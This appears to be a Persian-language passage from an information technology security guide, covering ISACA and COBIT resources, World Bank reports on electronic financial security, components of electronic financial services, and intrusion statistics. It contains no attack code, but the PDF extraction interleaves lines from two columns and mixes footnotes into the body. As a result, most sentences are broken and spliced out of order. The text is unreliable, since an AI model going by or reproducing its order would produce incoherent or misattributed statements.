ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺭﻭﻱ ﺍﻣﻨﻴﺖ ،ﻳﻚ ﻣﻌﻴﺎﺭ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻌﻴﻴﻦ ﻛﻨﻨﺪ. ﺩﻗﻴﻘﺘﺮ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺧﻂ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﺩ.
ﻭﻗﺘﻲ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺳﻴﺪ ،ﻣﺪﻳﺮﻳﺖ ﻧﺒﺎﻳـﺪ
ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺍﻳﻦ ﺍﺻـﻼﺣﺎﺕ ﺑـﺪﻭﻥ
ﺍﻫﻤﻴﺖ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻣﻤﻴﺰﻳﻬﺎﻱ ﻣـﻨﻈﻢ ﻃـﺮﺡ
ﻣﺨﺎﻃﺮﻩ ﻧﻴﺴﺘﻨﺪ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ
ﻼ
ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻛﻨﺪ .ﺗﻐﻴﻴﺮﺍﺕ ﺭﺍﻳﺎﻧﻪ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺷﺒﻜﻪ ،ﻣﺜ ﹰ
ﻭ ﭼﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﻲ ﻛﻪ ﻛﻤﺘﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺁﻳﻨـﺪ ﺻـﺪﻕ
ﺍﺯ ﻧﻮﻋﻲ ﻛﻪ ﺑﻪ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﺘﻦﺑﺎﺯ ١٧ﻣﻨﺤـﺼﺮ ﺍﺳـﺖ،
ﻣﻲﻛﻨـﺪ .ﺩﺭ ﺍﻳـﻦ ﺑﺨـﺶ ،ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ ﺣـﻮﺯﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ
ﺑﻪ ﺑﺮﺭﺳﻲ ﻛﺎﻣﻞ ﻃﺮﺡ ﺗﻔﺼﻴﻠﻲ ﺍﻣﻨﻴﺖ ﻧﻴﺎﺯ ﺩﺍﺭﺩ .ﺑﻄﻮﺭ ﺧﻼﺻـﻪ
ﺍﻃﻼﻋﺎﺕ ﻛـﻪ ﺷـﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ ﻭ ﻛﻮﭼـﻚ ﻭ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ
ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﻳﻚ ﻋﻠﻢ ﺑﺎﺷﺪ ﻳﻚ ﻫﻨﺮ
ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻣـﻲﺷـﻮﻧﺪ ﻣـﻮﺭﺩ
ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺗﺄﺛﻴﺮﮔـﺬﺍﺭﻱ ﻣﻮﻓـﻖ ﺁﻥ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ
ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﻗﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻳﻦ ﺑﺨـﺶ ﺑـﺎ ﺗﻮﺟـﻪ
ﺧﺎﺹ ﺑﻪ ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻭﺍﻳـﺮ ﺍﺟﺮﺍﻳـﻲ ،ﻣـﺪﻳﺮﺍﻥ ،ﻭ
15 Information System Audit and Control ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ،ﻣـﺸﺘﺮﻳﺎﻥ ،ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻭ
)Association (ISACA
ﺑﺮﺍﻱ ﺁﮔﺎﻫﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﻳﻨﺪﺓ ﺍﻳﻦ ﺍﻧﺠﻤﻦ ﺑﻪ ﭘﺎﻳﮕـﺎﻩ ﺁﻥ ﺩﺭ ﺁﺩﺭﺱ ۱۶ ﺩﻳﮕﺮ ﺍﻓﺮﺍﺩ ﺫﻳﻨﻔﻊ ﺩﺭ ﺷﺮﻛﺖ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﺳـﺖ.
ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ: ﻓﻬﺮﺳــﺘﻬﺎﻱ ﻛﻨﺘــﺮﻝ ١٣ﻭ ﻳﺎﺩﺩﺍﺷــﺘﻬﺎﻱ ﺭﻭﺍﻝﻣﻨــﺪ ١٤ﺑﺮﺍﺣﺘــﻲ
http://www.isaca.org
ﺍﻳﻦ ﻣﻄﺎﻟﻌﻪ ﺑﺎﻋﺚ ﺷﺪ ﻛﺸﻮﺭ ﺍﺭﻭﮔﻮﺋﻪ ﻳﻚ ﻛﺸﻮﺭ ﻣـﻮﺭﺩ ﻋﻼﻗـﻪ ﺑـﺮﺍﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳﻂ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﺩﻭﻟﺘـﻲ ﻳـﺎ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ ﻣـﻮﺭﺩ
ﻣﻄﺎﻟﻌﺔ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﺷﻮﺩ ):(۱ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ.
http://www.isaca.org/ct_case.htm
(http://www.isaca.org/cobit.htm) COBITﻳﻚ ﺑﺴﺘﺮ ﺑﺮﺍﻱ ﻋﻼﻭﻩ ﺑﺮ ﺭﻭﺍﻟﻬﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﺍﺧﻠـﻲ ،ﺑﻌـﻀﻲ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﻣﻨﺎﺑﻊ ﻣﻨﺎﺳـﺐ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴـﻚ ﺟﻬـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ،
ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﻧﺪ ﺗﺄﻣﻴﻦ ﻧﻴﺎﺯﻫـﺎﻱ
ﻛﺎﺭﺑﺮﺍﻥ ،ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ،ﻛﻨﺘﺮﻝ ،ﻭ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺖ ﺍﺭﺍﺋـﻪ
ﻛﺮﺩﻩ ﺍﺳﺖ .ﺑﺮﻗـﺮﺍﺭﻱ ﺗﻤـﺎﺱ ﺑـﺎ ISACAﺑـﻪ ﺷـﻤﺎ ﺩﻳـﺪ ﺧـﻮﺑﻲ ﺍﺯ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻓﻌﻠﻲ ﻭ ﺁﺗﻲ ﺍﻧﺠﻤﻦ ﻣﻲﺩﻫﺪ. 13 Checklist
17 Open Source Software Packages 14 Procedural Notes
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٢٦
ﻲ
ﺟﺪﻳﺪ ﺩﺭ ﺗﻤﺎﺱ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﻣﻨـﺎﻓﻊ ﺑـﺎﻟﻘﻮﺓ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺟﻬـﺎﻧ ﹺ
ﺟﻮﺍﻣﻊ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﻫﺴﺘﻨﺪ ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻬﻴﻨﻪ ﺍﺯ
ﺍﻳﻦ ﺑﺎﺯﺍﺭﻫﺎ ﻣﻴﺴﺮ ﻧﻤﻲﺷﻮﺩ ﻣﮕـﺮ ﺑـﺎ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻣﺤـﻴﻂ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ .ﺑﻪ ﻫﺮ ﺗﺮﺗﻴﺐ ،ﺭﻭﻧﺪ ﺣﺮﻛﺖ ﺍﻗﺘﺼﺎﺩ ﺟﻬـﺎﻧﻲ ﺑﺤـﺚ
ﻋﻤﻴﻘﻲ ﺩﺭﺑﺎﺭﺓ ﺗﺠﺎﺭﺕ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻧﻮﻳﻦ ﺭﺍ ﻣﻲﻃﻠﺒﺪ :ﭼﮕﻮﻧﻪ ﻓﺼﻞ ﺩﻭﻡ
ﺑﺎﻳﺪ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ٢٢ﺭﺍ ﺗﻌﺮﻳـﻒ ﻭ ﺍﺯ ﺁﻥ ﻣﺤﻔﺎﻇـﺖ ﻛـﺮﺩ؟،
ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺩﻳﺠﻴﺘﺎﻝ ﭼﻪ ﻣﻌﻨﺎ ﻭ ﻣﻔﻬـﻮﻣﻲ
ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﻭﺷﻬﺎﻱ ﻛﺎﻫﺶ ﺁﺛﺎﺭ
١٩
ﺩﺍﺭﻧﺪ؟ ،ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﺳﻄﺢ ﻣﻨﺎﺳـﺒﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺭﺍ ﻣـﺸﺨﺺ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻛﺮﺩ؟ ،ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ،ﭼﮕﻮﻧـﻪ
ﺺ ﺑﺎﺯﮔﺸﺖ ﺳﺮﻣﺎﻳﻪ ) ٢٣(ROIﺭﺍ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻧﻤﻮﺩ؟
ﺑﺎﻳﺪ ﺷﺎﺧ ﹺ ﻛﻠﻴﺎﺕ
ﺑﻪ ﻋﻠﺖ ﻣﺎﻫﻴﺖ ﻫﻤﻮﺍﺭﻩ ﻣﺘﻐﻴ ﹺﺮ ﻓﻨﺎﻭﺭﻱ ،ﺍﻳﻦ ﻛﺘـﺎﺏ ﻧـﻪﺗﻨﻬـﺎ ﺑـﻪ
ﺍﻳﻦ ﻓﺼﻞ ﺍﺯ ﻛﺘﺎﺏ ﺑﻪ ﺷﻨﺎﺳﺎﻳﻲ ،ﺗﻌﺮﻳﻒ ،ﻭ ﺑﺤﺚ ﺩﺭ ﻣﻮﺭﺩ ﻳـﻚ
ﺟﺰﺋﻴﺎﺕ ﺗﻤﺎﻡ ﺍﻳﻦ ﻣﻮﺿﻮﻋﺎﺕ ﻧﻤﻲﭘﺮﺩﺍﺯﺩ ،ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺑﻌـﻀﻲ ﺍﺯ ﻣﺠﻤﻮﻋــﻪ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻫــﺸﺖ ﺭﻛﻨــﻲ ﻭ ﻧﻴــﺰ ﻳــﻚ
ﺁﻧﻬﺎ ﭘﺎﺳﺨﻬﺎﻱ ﻛﻠﻲ ﻫﻢ ﺍﺭﺍﺋﻪ ﻧﻤﻲﻛﻨﺪ .ﺩﺭ ﻋـﻮﺽ ﺑـﻪ ﻣـﺮﻭﺭﻱ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻲ ﺟﻬﺖ ﺗﻘﻮﻳﺖ ﻣﺤﻴﻂ ﺍﻣـﻦ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺮﺍﻱ
ﺳــﺮﻳﻊ ﺑــﺮ ﺁﻧﭽــﻪ ﺗــﺎ ﺍﻣــﺮﻭﺯ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻣﻨﻴــﺖ ﺍﺗﻔــﺎﻕ ﺍﻓﺘــﺎﺩﻩ،
ﺑﺨﺶ ﺳﻮﻡ
ﺍﻳﻦ ﺭﺳﺎﻟﻪ ﺍﻭﺝ ﺗﻼﺷﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻪ ﺳﺎﻝ ﺍﺧﻴﺮ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﻭ ﺑـﻪ ﺍﻳــﻦ ﻓــﺼﻞ ﺑــﺎ ﻛﻤــﻚ ﻳــﻚ ﮔــﺰﺍﺭﺵ ﻛــﻪ ﺑﻮﺳــﻴﻠﺔ Thomas ۱۹
ﺍﺭﺍﺋﻪ ﭼﻨﺪ ﻣﻘﺎﻟﻪ ﻣﻨﺠﺮ ﺷﺪﻩ ﺍﺳـﺖ .ﭼﻨـﺪ ﻣﻘﺎﻟـﺔ ﺩﻳﮕـﺮ ﺍﺯ ﺍﻳـﻦ ﺩﺳـﺘﻪ ،Tom Kellerman ،Glaessnerﻭ Valerie McNevin
ﻣﻘﺎﻻﺕ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ: ﺩﺭ ﺳﺎﻝ ۲۰۰۲ﺑﺮﺍﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺗﻬﻴﻪ ﺷﺪ ﺑﻪ ﻧﮕﺎﺭﺵ ﺩﺭ ﺁﻣﺪﻩ ﺍﺳﺖ:
“Electronic Security: Risk Mitigation in "Electronic Security: Risk Mitigation in
Financial Transactions” (May 2002, June Financial Transactions.":
2002, July 2002), http://wbln0018.worldbank.org/html/FinancialS
“Electronic Finance: A New Approach to ectorWeb.nsf/SearchGeneral?openform&E-
Financial Sector Development?” (2002), Security/E-Finance&Publications
“Mobile Risk Management: E-Finance in the 20 E-Finance
)Wireless Environment” (May 2002 ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ،ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ Kellerman ،Glaessnerﻭ ۲۱
ﻛﻪ ﻫﻤﮕﻲ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻫﺴﺘﻨﺪ: McNevinﺍﺯ ﺟﻤﻠﻪ ﻛﺘﺎﺏ ﺯﻳﺮ ﺭﺍ ﺑﺒﻴﻨﻴﺪ:
http://www.worldbank1.org/finance "Electronic Safety and Soundness: Securing
22 Privacy "Finance in a Digital Age, Public Policy Issues
23 Return on Investment )(October 2003
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٢٨
ﻫﻤﺎﻥ ﺗﻌﺪﺍﺩ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﺩﺭ ﺗﻨﻬﺎ ﭼﻨـﺪ ﺛﺎﻧﻴـﻪ ﺑـﻪ ﺳـﺮﻗﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺧﻠـﻲ
ﺑﺒﺮﺩ. ﻭ ﺧﺎﺭﺟﻲ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺑﺎﺷﺪ .ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺖ ﻛﻪ ﺳﻄﺢ ﺍﻣﻨﻴـﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﺮ ﻓﻌﺎﻟﻴﺖ ﺑﺎﻳﺪ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﺍﺭﺯﺵ ﺁﻥ ﻓﻌﺎﻟﻴﺖ ﺑﺎﺷﺪ؛
ﺑﺮ ﺍﺳﺎﺱ ﺑﺮﺭﺳﻴﻬﺎﻱ ﺍﺧﻴﺮ ﺗﺨﻤـﻴﻦ ﺯﺩﻩ ﻣـﻲﺷـﻮﺩ ﻛـﻪ %۵۷ﺍﺯ
ﺑﻨــﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴــﺖ ﺑــﺮﺍﻱ ﺗﺮﺍﻛﻨــﺸﻬﺎ ﻭ ﻣﻌــﺎﻣﻼﺕ ﻣﻬــﻢ ﺑﺎﻳــﺪ ﺩﺭ
ﺣﻤﻼﺕ ﻧﻔﻮﺫ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﻣـﺎﻟﻲ
ﺳﻄﺤﻲ ﺑﺎﻻﺗﺮ ﺍﺯ ﺗﺮﺍﻛﻨﺸﻬﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﻋﺎﺩﻱ ﺗﺄﻣﻴﻦ ﺷﻮﺩ.
ﺷﺮﻭﻉ ﺷﺪﻩ ﺑﻮﺩﻧﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﺨﻠﻔﺎﺕ ﻧﻈﻴﺮ ﻳـﻚ ﻣـﻮﺭﺩ ﺟـﺪﻱ
ﻛﻪ ﺩﺭ ﻭﺯﺍﺭﺕ ﺧﺰﺍﻧـﻪﺩﺍﺭﻱ ﺁﻣﺮﻳﻜـﺎ ﺭﺥ ﺩﺍﺩ ﻧﺎﺷـﻲ ﺍﺯ ﺍﺷـﺘﺒﺎﻩ ﺩﺭ
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻳﻚ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪﻱ ﻧﻴﺰ
ﭘﻴــﺎﺩﻩﺳــﺎﺯﻱ ﺭﻭﻧــﺪﻫﺎﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﻣﺨــﺎﻃﺮﻩ ﻭ ﺑﻜــﺎﺭﮔﻴﺮﻱ
ﺑﻮﺟــﻮﺩ ﻣــﻲﺁﻭﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻳﻬــﺎ ﻫــﺮ ﺭﻭﺯ ﮔــﺴﺘﺮﺩﻩﺗــﺮ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺁﻣـﺎﺩﻩ ﺑـﺪﻭﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻫـﺎﻱ
ﻣﻲﺷﻮﻧﺪ ،ﻟﺬﺍ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷﺎﻳـﺴﺘﺔ ﺗﻮﺟـﻪ
ﭼﻨﺪﻻﻳــﺔ ﺍﻣﻨﻴﺘــﻲ -ﻣــﻮﺍﺭﺩﻱ ﭼــﻮﻥ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻛﺎﺭﻛﻨــﺎﻥ،
ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣـﻨﻈﻢ ﺍﺑـﺰﺍﺭ ﻓﻨـﻲ ﻣـﻮﺭﺩ
ﺑﻴﺸﺘﺮﻱ ﺍﺳﺖ.
ﺍﺳﺘﻔﺎﺩﻩ ﻣﺎﻧﻨﺪ ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ٢٨ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ - ٢٩ﺑﻮﺩﻧـﺪ. ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺑﻜـﺎﺭ ﺑـﺮﺩﻥ ﻭﺳـﺎﻳﻞ
ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺍﺧﺒﺎﺭ ﺁﻥ ﺑﻪ ﺭﺳﺎﻧﻪﻫﺎ ﻧﻴﺰ ﺭﺍﻩ ﭘﻴﺪﺍ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ،ﺍﻧﺘﻘـﺎﻝ ﻋﻼﺋـﻢ ﻭ ﺍﺳـﻨﺎﺩ
ﻛﺮﺩ ﻃﻴﻔﻲ ﺷﺪ ﻛﻪ ﻳﻜﺴﻮﻱ ﺁﻥ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺷﻬﺮﺕ ﻭ ﺍﻋﺘﺒـﺎﺭ ﺍﻋﺘﺒﺎﺭﻱ ،ﻭ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭ ﺳﺘﺪ ﺩﺭ ﻳﻚ ﻣﺤـﻴﻂ ﺗﺠـﺎﺭﻱ .ﺧـﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﻭ ﺳﻮﻱ ﺩﻳﮕﺮ ﺁﻥ ﺗﻐﻴﻴﺮ ﺭﻓﺘﺎﺭ ﻧﻬﺎﻥ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﺟﺰﺀ ﭘﺎﻳﻪﺍﻱ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ:
ﺩﺍﺩ ﻭ ﺳﺘﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻮﺩ؛ ﻭ ﺍﻳﻦ ﻫﻤﻪ ﺩﻟﻴﻠﻲ ﻧﺪﺍﺷﺖ ﺟﺰ ﻋـﺪﻡ
ﺍﻋﺘﻤﺎﺩ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﻭﺍﺳـﻄﻪﻫـﺎﻱ ﺗﺠـﺎﺭﺕ ﻭ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )٢٤(EFTs؛ •
ﺳﻴﺎﺳﺘﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﻮﺟـﻪ ﺧﺎﺻـﻲ ﺑـﻪ ﺍﻳـﻦ ﺗـﻮﺍﺯﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ،ﺧـﺪﻣﺎﺕ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺑﻮﺳـﻴﻠﺔ
ﺩﺍﺷﺖ. ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ،ﻧﺸﺎﻧﻬﺎ ،ﻛﻠﻴـﺪﻫﺎ ﻭ ﻳـﺎ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺯﻳـﺴﺘﻲ؛ ﻛـﻪ
ﻫﻤﮕــﻲ ﻫﻮﻳــﺖ ﮔﺮﻭﻫﻬــﺎ ﻳــﺎ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫــﺎ ﺭﺍ ﺗــﺼﺪﻳﻖ
ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﻻﺯﻣﺔ ﺭﻓـﺎﻩ ،ﺁﺳـﺎﻳﺶ ﻭ ﺳـﻼﻣﺖ
ﻣﻲﻛﻨﻨﺪ.
ﻋﻤﻮﻣﻲ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻣﺪ ﻭ ﺍﺯ ﺍﻳﻨﺮﻭ ﻳﻚ ﺟـﺰﺀ ﺍﺻـﻠﻲ ﺿـﻮﺍﺑﻂ
ﺁﻥ ،ﺗﻮﺳﻌﺔ ﺧﺪﻣﺎﺕ ﺑﻪ ﻣﻨﻈﻮﺭ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻡ ﺑﻮﺩ .ﺍﻣـﺎ ﺩﺭﺣـﺎﻝ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻋﻼﻭﻩ ﺑﺮ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺠﻢ ﻗﺎﺑﻞ
ﺣﺎﺿـﺮ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺧـﺪﻣﺎﺕ ﺍﻭﻟﻴــﺔ ﺗﻮﺟﻬﻲ ﺍﺯ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻓﻲﻣﺎﺑﻴﻦ ﻋﺮﺿـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻳﻚ ﺿﺮﻭﺭﺕ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ. ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﻧﻴﺰ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨـﺪ .ﺍﻳـﻦ
ﺷﺮﻛﺘﻬﺎ ﺷﺎﻣﻞ ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥISP ،٣٠ﻫـﺎ ﻭ ﺍﺭﺍﺋـﻪﺩﻫﻨـﺪﮔﺎﻥ
ﺍﺯ ﻟﺤﺎﻅ ﺗﺎﺭﻳﺨﻲ ،ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ ﻣﻨﻄـﻖ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻫﺴﺘﻨﺪ .ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺕ ﺩﺭ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺟﺪﻳـﺪ
